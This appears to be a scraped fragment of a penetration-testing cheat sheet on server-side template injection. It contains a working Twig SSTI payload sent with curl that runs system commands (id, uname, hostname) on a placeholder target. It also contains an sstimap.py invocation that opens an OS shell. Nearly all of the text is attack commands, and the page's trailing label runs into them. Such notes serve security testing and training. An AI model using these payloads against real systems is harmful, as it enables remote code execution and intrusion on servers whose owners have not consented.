SSTI Exploitation Example 1
curl -X POST -d 'name={{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id;uname -a;hostname")}}' http://<TARGET IP>:<PORT>./sstimap.py -u 'http://<TARGET IP>:<PORT>' -d name=john --os-shellLast updated